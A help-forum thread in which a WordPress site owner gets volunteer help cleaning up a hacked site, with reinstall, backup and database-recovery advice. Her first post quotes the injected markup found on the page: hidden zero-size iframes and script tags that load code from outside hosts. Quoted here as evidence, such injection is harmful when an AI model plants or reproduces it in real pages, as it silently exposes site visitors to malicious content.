# Help here for hacked site?



## nanrector (Jun 12, 2005)

Been a while since I've been here but I can't seem to find help elsewhere. Can I get any input on hunting down a script that was placed on my website? My host says they can't help. Assuming this is an appropriate question:

Found out one of my sites was down. 500 Internal Server Error. I contact host and they said the htaccess file had something in it that they removed and it fixed it. Thing is it didn't. The page shows with graphical AAAAA's continuing to fill the top part of it. Host says they can't see it and it looks ok on their side but I inspected the element in firebug and it shows the following script below. I'm just not knowledgeable enough to figure out how to get rid of it. 
Site: www.apainfultruth.com (wordpress site. I can access cpanel but not my wp admin)

When I ftp on it showed a bunch of weird short named folders with index.php in them. I deleted them all but the problem still exists. Screenshot attached along with sub-shot of a few of the folders I removed.

Any input would sure be appreciated.

Nancy


```
<body>
<iframe width="0" height="0" frameborder="no" scrolling="no" marginheight="0" marginwidth="0" border="0" src="http://weiboyy.applinzi.com/">
<divstyle="display:none">
<script src="http://js.users.51.la/18702052.js" type="text/javascript" language="javascript">
<a title="51.La 网站流量统计系统" target="_blank" href="http://www.51.la/?18702052">
<img style="border:none" src="http://icon.51.la/icon_0.gif" alt="51.La 网站流量统计系统">
</a>
<script type="text/Javascript" src="http://u.1133.cc/d/?pid=208885&show_t=2">
<script src="http://js.users.51.la/18713595.js" type="text/javascript" language="javascript">
<a title="51.La 网站流量统计系统" target="_blank" href="http://www.51.la/?18713595">
<script src="http://niu.code668.com/page/?s=13182">
<iframe width="0" height="0" frameborder="no" scrolling="no" marginheight="0" marginwidth="0" border="0" src="http://weiboyy.applinzi.com/">
<divstyle="display:none">
</divstyle="display:none">
</body>
```


----------



## Couriant (Mar 26, 2002)

In case you hit a wall here, try https://community.spiceworks.com/programming -- the spiceworks community has helped me a lot over the last few weeks. It should be free


----------



## colinsp (Sep 5, 2007)

Looking at your screenshot this is a Wordpress site that has been hacked.

I also presume you don't have a pre hack backup? If you do restore that.

Recovering from a hack on a Wordpress site can be quite time consuming and difficult to do. One thing to try is installing Sucuri it may be able to do the cleanup for you.

Alternatively you may be lucky just by doing a reinstall of Wordpress, however, as Wordpress uses a database then some malicious code may still be stored there and even with a fresh install it may reappear. It may well be easier and quicker to start again and ensure that you keep Wordpress, Themes and Plugins up to date at all times and install some security plugins such as Sucuri and Wordfence. Also ensure that you have regular backups of both your website files and the database.


----------



## JiminSA (Dec 15, 2011)

Nancy, great to see that our WordPress Guru Colin (@colinsp) has stepped in as I thought he would
I saw that like thousands of other unprotected WordPress users, you were hacked via javascript injection ...
Hopefully, this article should be of interest ...


colinsp said:


> One thing to try is installing Sucuri


 I would do as Colin suggests, both now and after the clean up if you have to start from scratch ...


----------



## nanrector (Jun 12, 2005)

Thanks so much for the info. I'm beyond frustrated at myself for not having better protection in place on this particular site. Its not one that's kept updated though it does get a regular traffic. I will go through all the info provided and report back. 
Nancy


----------



## nanrector (Jun 12, 2005)

Well I found an old backup from a year ago which I re-uploaded. It let me back into my wp control panel. I've changed all passwords and logins. I've updated to the new WP and removed all extra themes and plugins not being used and updated to current ones. I installed Sucuri. But no matter how often I update the .htaccess file it keeps eventually getting replaced with added things in it. I'd love to have Sucuri repair it but as I'm sure with a few others I don't really have the $300 a year to fix this one issue. (Unless I ready that wrong. )

Just an update. I'm going to have to figure this out myself no matter how long it takes. A good portion a of my morning has been spent updating ALL my wordpress site logins and making sure the were secure. 

Nancy


----------



## colinsp (Sep 5, 2007)

Nancy

Sucuri does add to the htaccess file. Post the contents of it here in code tags so we can take a look.


----------



## nanrector (Jun 12, 2005)

colinsp said:


> Nancy
> 
> Sucuri does add to the htaccess file. Post the contents of it here in code tags so we can take a look.


It seems to not be doing it now. I was sure it happened before I updated to Sucuri but I could be mistaken. I've been doing so many things to try and fix it I may have been confused. I also changed my site from no www back to the www version and though the AAA's appear to be gone there is still a blank page with a small ad on top. Interestingly when I do a Sucuri scan online the www version shows infected but the version without the www shows clean. Though I have no idea what that's about.

This is what it shows now which seems ok to me though I again, I'm not sure what its supposed to look like.


```
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
```


----------



## nanrector (Jun 12, 2005)

Whatever I've done, my front page now just shows blank. The code is as follows. I have the skill to go in and delete what is needed but I just can't figure out what to delete or how to find it.


```
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title> A Painful Truth</title>
<link rel="alternate" type="application/rss+xml" title="A Painful Truth RSS Feed" href="http://www.apainfultruth.com/feed/" />
<link rel="alternate" type="application/atom+xml" title="A Painful Truth Atom Feed" href="http://www.apainfultruth.com/feed/atom/" />
<link rel="pingback" href="http://www.apainfultruth.com/xmlrpc.php" />
<link rel="icon" href="http://www.apainfultruth.com/wp-content/themes/wppolitico/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" href="http://www.apainfultruth.com/wp-content/themes/wppolitico/style.css" type="text/css" media="screen" />
<link rel="stylesheet" href="http://www.apainfultruth.com/wp-content/themes/wppolitico/scripts/prettyPhoto.css" type="text/css" media="screen" />
<!--[if IE]>
<link rel="stylesheet" href="http://www.apainfultruth.com/wp-content/themes/wppolitico/ie_style.css" type="text/css" />
<![endif]-->

<!--[if IE 7]><link rel='stylesheet' id='css-ie-fix' href='http://www.apainfultruth.com/wp-content/plugins/special-recent-posts/assets/css/css-ie7-fix.css' type='text/css' media='all' /> <![endif]--><link rel="alternate" type="application/rss+xml" title="A Painful Truth &raquo; Home Comments Feed" href="http://www.apainfultruth.com/home/feed/" />
        <script type="text/javascript">
            window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/www.apainfultruth.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.4.2"}};
            !function(a,b,c){function d(a){var c,d=b.createElement("canvas"),e=d.getContext&&d.getContext("2d"),f=String.fromCharCode;return e&&e.fillText?(e.textBaseline="top",e.font="600 32px Arial","flag"===a?(e.fillText(f(55356,56806,55356,56826),0,0),d.toDataURL().length>3e3):"diversity"===a?(e.fillText(f(55356,57221),0,0),c=e.getImageData(16,16,1,1).data.toString(),e.fillText(f(55356,57221,55356,57343),0,0),c!==e.getImageData(16,16,1,1).data.toString()):("simple"===a?e.fillText(f(55357,56835),0,0):e.fillText(f(55356,57135),0,0),0!==e.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag"),unicode8:d("unicode8"),diversity:d("diversity")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag&&c.supports.unicode8&&c.supports.diversity||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
        </script>
        <style type="text/css">
img.wp-smiley,
img.emoji {
    display: inline !important;
    border: none !important;
    box-shadow: none !important;
    height: 1em !important;
    width: 1em !important;
    margin: 0 .07em !important;
    vertical-align: -0.1em !important;
    background: none !important;
    padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wpts_ui_css-css'  href='http://www.apainfultruth.com/wp-content/plugins/wordpress-post-tabs/css/styles/gray/style.css?ver=1.6' type='text/css' media='all' />
<link rel='stylesheet' id='open-sans-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&#038;subset=latin%2Clatin-ext&#038;ver=4.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://www.apainfultruth.com/wp-includes/css/dashicons.min.css?ver=4.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='admin-bar-css'  href='http://www.apainfultruth.com/wp-includes/css/admin-bar.min.css?ver=4.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='srp-front-stylesheet-css'  href='http://www.apainfultruth.com/wp-content/plugins/special-recent-posts/assets/css/css-front.css?ver=4.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='adsns-css'  href='http://www.apainfultruth.com/wp-content/plugins/adsense-plugin/css/adsns.css?v=1.38&#038;ver=4.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://www.apainfultruth.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.4.1' type='text/css' media='all' />
<link rel='stylesheet' id='wp-email-css'  href='http://www.apainfultruth.com/wp-content/plugins/wp-email/email-css.css?ver=2.67.1' type='text/css' media='all' />
<link rel='stylesheet' id='A2A_SHARE_SAVE-css'  href='http://www.apainfultruth.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.12' type='text/css' media='all' />
<script type='text/javascript' src='http://www.apainfultruth.com/wp-includes/js/jquery/jquery.js?ver=1.11.3'></script>
<script type='text/javascript' src='http://www.apainfultruth.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
<script type='text/javascript' src='http://www.apainfultruth.com/wp-content/plugins/google-publisher/js/previewloader.js?ver=1.2.1'></script>
<link rel='https://api.w.org/' href='http://www.apainfultruth.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.apainfultruth.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.apainfultruth.com/wp-includes/wlwmanifest.xml" />
<link rel="canonical" href="http://www.apainfultruth.com/" />
<link rel='shortlink' href='http://www.apainfultruth.com/' />

<script type="text/javascript"><!--
var a2a_config=a2a_config||{},wpa2a={done:false,html_done:false,script_ready:false,script_load:function(){var a=document.createElement('script'),s=document.getElementsByTagName('script')[0];a.type='text/javascript';a.async=true;a.src='http://static.addtoany.com/menu/page.js';s.parentNode.insertBefore(a,s);wpa2a.script_load=function(){};},script_onready:function(){wpa2a.script_ready=true;if(wpa2a.html_done)wpa2a.init();},init:function(){for(var i=0,el,target,targets=wpa2a.targets,length=targets.length;i<length;i++){el=document.getElementById('wpa2a_'+(i+1));target=targets[i];a2a_config.linkname=target.title;a2a_config.linkurl=target.url;if(el){a2a.init('page',{target:el});el.id='';}wpa2a.done=true;}wpa2a.targets=[];}};a2a_config.callbacks=a2a_config.callbacks||[];a2a_config.callbacks.push({ready:wpa2a.script_onready});a2a_config.templates=a2a_config.templates||{};
a2a_config.show_title=1;
//--></script>

<!-- add_your_own_headers 0.4.1 -->
<script type="text/javascript" src="http://www.apainfultruth.com/wp-content/plugins/audio-player/assets/audio-player.js?ver=2.0.4.6"></script>
<script type="text/javascript">AudioPlayer.setup("http://www.apainfultruth.com/wp-content/plugins/audio-player/assets/player.swf?ver=2.0.4.6", {width:"290",animation:"no",encode:"yes",initialvolume:"60",remaining:"no",noinfo:"no",buffer:"2",checkpolicy:"no",rtl:"no",bg:"d1b666",text:"0a0505",leftbg:"598DBF",lefticon:"333333",volslider:"666666",voltrack:"FFFFFF",rightbg:"598DBF",rightbghover:"999999",righticon:"333333",righticonhover:"FFFFFF",track:"FFFFFF",loader:"009900",border:"CCCCCC",tracker:"DDDDDD",skip:"666666",pagebg:"FFFFFF",transparentpagebg:"yes"});</script>
<style type='text/css'></style>

    <!-- This site uses Good Old Gallery, get it from http://wp.unwi.se/good-old-gallery -->

<script type="text/javascript" src="http://www.apainfultruth.com/wp-content/plugins/hover/behaviour/behaviour.js"></script>
<script type="text/javascript" src="http://www.apainfultruth.com/wp-content/plugins/hover/domTT/domLib.js"></script>
<script type="text/javascript" src="http://www.apainfultruth.com/wp-content/plugins/hover/domTT/domTT.js"></script>
<script type="text/javascript">var domTT_styleClass = 'hover';</script>
<script type="text/javascript" src="http://www.apainfultruth.com/wp-content/plugins/hover/hover.js"></script>
<link type="text/css" rel="stylesheet" href="http://www.apainfultruth.com/wp-content/plugins/hover/hover.css" />
<title>A Painful Truth</title><meta name="description" content="" />
<meta name="keywords" content="" />
<link type="text/css" rel="stylesheet" href="http://www.apainfultruth.com/wp-content/plugins/simple-pull-quote/css/simple-pull-quote.css" />
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");twitterWidgets.onload = _ga.trackTwitter;</script>
<meta name="google-site-verification" content="9YlkRqSNKzBpJio-RlEtLVmCLO-bgkgoXIp_Za7KnAI" /><meta name="google-site-verification" content="vT2AUg70o8qAlUq8ts6vtn1co6PRlJGFsxaX5AR_1QM" /><style type="text/css" media="all">
/* <![CDATA[ */
@import url("http://www.apainfultruth.com/wp-content/plugins/wp-table-reloaded/css/plugin.css?ver=1.9.4");
@import url("http://www.apainfultruth.com/wp-content/plugins/wp-table-reloaded/css/datatables.css?ver=1.9.4");
.wp-table-reloaded-id-2 {width: 500px;}
.wp-table-reloaded-id-3 {width: 500px;}

.wp-table-reloaded-id-2 td {
  font-family: Times New Roman;
  font-size: 15px;
  color: #000000;
}


.wp-table-reloaded-id-3 td {
  font-family: Times New Roman;
  font-size: 15px;
  color: #000000;
}

.wp-table-reloaded-id-5 td {
  font-family: Times New Roman;
  font-size: 14px;
  color: #000000;
}


.wp-table-reloaded-id-5 .row-1 .column-a {
   background-color: #ff0000;
}
/* ]]> */
</style><style type="text/css" media="print">#wpadminbar { display:none; }</style>
<style type="text/css" media="screen">
    html { margin-top: 32px !important; }
    * html body { margin-top: 32px !important; }
    @media screen and ( max-width: 782px ) {
        html { margin-top: 46px !important; }
        * html body { margin-top: 46px !important; }
    }
</style>
<meta data-pso-pv="1.2.1" data-pso-pt="front" data-pso-th="22974a56be647a7b0456cf918a2e33b2">


<!--[if lt IE 8]>
<script src="http://ie7-js.googlecode.com/svn/version/2.0(beta3)/IE8.js" type="text/javascript"></script>
<![endif]-->

<style type="text/css">
a {color:
```


----------



## colinsp (Sep 5, 2007)

Nancy

The htaccess is fine nothing there that shouldn't be.

I get a blank page on both with and without www.

Two things to try

1: Go to Dashboard > Settings > Permalinks and change the permalink setting to something else. Save. Then change it back to how you want and save again.

2: Go to Dashboard > Settings > Reading and check what page is shown for you home page. It may be worth creating a new page that is a copy of what you want your home page to be and then assign that to be your new home page.

If this doesn't work you can create an admin account for me and PM me the login details and I will take a look if you would like.


----------



## nanrector (Jun 12, 2005)

I tried your suggestions Colin but nothing worked. No matter what inner page or post I try to go to they are all blank on the front end, even when I create new ones. I have PM'd you the info. Sure appreciate your help.

Nancy


----------



## colinsp (Sep 5, 2007)

Nancy,

Got the details will take a look later and come back to you.


----------



## nanrector (Jun 12, 2005)

Thanks Colin. Whenver you have time. Ü


----------



## colinsp (Sep 5, 2007)

Nancy

It looks like your theme is causing the problem.

I deactivated all your plugins and there was no change still a blank page. I installed the 2016 theme as you had deleted it (you should always leave at least one Wordpress default theme installed on your site). The home page displayed fine. I then re-enabled all your plugins and the site still works with the 2016 theme. The moment I switch back to your Politico theme the site breaks again. This means that either some theme files have been compromised or the theme is incompatible with Wordpress 4.4.2. I have left the 2016 theme enabled so you can see that the site works.

My advice is to delete the theme ideally by FTP to ensure there is nothing left behind and then download a fresh copy of it.

Let me know how you get on and if you need any more help.


----------



## nanrector (Jun 12, 2005)

Thank you Colin so much for narrowing that down. I didn't' think to do that. I will do as you suggest and get back to you asap!


----------



## nanrector (Jun 12, 2005)

I deleted the old theme and reinstalled a fresh copy. Problem solved! Not sure what I'd do without people like you donating time and helping out so willingly. Thank you again Colin for your work. I'll make sure I keep everything more secure form now on. Have a wonderful rest of your weekend!

Nancy


----------



## colinsp (Sep 5, 2007)

Glad you got it sorted. You can now delete my account.


----------



## nanrector (Jun 12, 2005)

Colin, I woke up this morning to a plethora of notices from Sucuri of failed login attempts. My site was up but my admin was giving errors as was any page I tried to edit. 
I originally got this error:

"Output has already been sent to the browser at /home/apainful/public_html/wp-includes/pomo/streams.php:1. Please make sure the command $xajax->processRequest() is placed before this."​I reuploaded that file and got another error so I just reuploaded a fresh copy of the wp-includes folder. A new error now and I can't see my site again...

<sigh> How do I fight something like this?? I changed the password and installed the security software but they still appear to be getting in. After I reinstalled a fresh copy of my theme to fix the problem I had go in and manually correct a bunch of the pages that were tweaked on my original theme install. Quite a bit of work so I'm hoping I don't have to do that one more time... at least until I can make sure I can prevent this from happening again.










-----


----------



## colinsp (Sep 5, 2007)

Nancy

It looks like there may have been some stuff left behind in the database that we didn't get rid of. The failed login attempts are nothing to worry about and are normal on any Wordpress site as hackers try to get in. I get many attempts every day on the Wordpress sites I look after.

I can't login to the backend and so it is difficult to do anything. You may have uploaded an incorrect version of wp-includes, it is always better to do a complete re-install of Wordpress rather than trying a piecemeal approach.

The only easy way to get your site up and running again is to delete everything and start again with a fresh install of Wordpress and a new database and then rebuild your site. The other way is to pay one of the expert firms such as Sucuri or Wordfence to clean the database for you and then sort out the rest of the site and that cost may well be more than the site is worth to you.

Sorry to be the bearer of bad news


----------



## nanrector (Jun 12, 2005)

I'm glad to know they didn't get in again anyway. It just worked so well for one day I thought I was in the clear. I may do as you suggest. Just wish I had access to the front end to copy the text from all my posts. I'll probably mess with it for a while longer before tossing in the towel. 

Thank you again for all your help!
Nancy


----------



## colinsp (Sep 5, 2007)

Nancy,

One thing you can try is backing up the database to your local machine. You could then do a local install and attach to that database with a fresh install of Wordpress in Wampserver or Desktopserver and then just export the posts. If you want to take a risk you could just copy the posts and postmeta tables to a new Wordpress install and see if that recovers them. It may be worth seeing if there is a local Wordpress expert who will help you out and try some of these things at the right price.


----------



## nanrector (Jun 12, 2005)

colinsp said:


> Nancy,
> 
> One thing you can try is backing up the database to your local machine. You could then do a local install and attach to that database with a fresh install of Wordpress in Wampserver or Desktopserver and then just export the posts. If you want to take a risk you could just copy the posts and postmeta tables to a new Wordpress install and see if that recovers them. It may be worth seeing if there is a local Wordpress expert who will help you out and try some of these things at the right price.


Ah.... thanks for that info. Very helpful.


----------

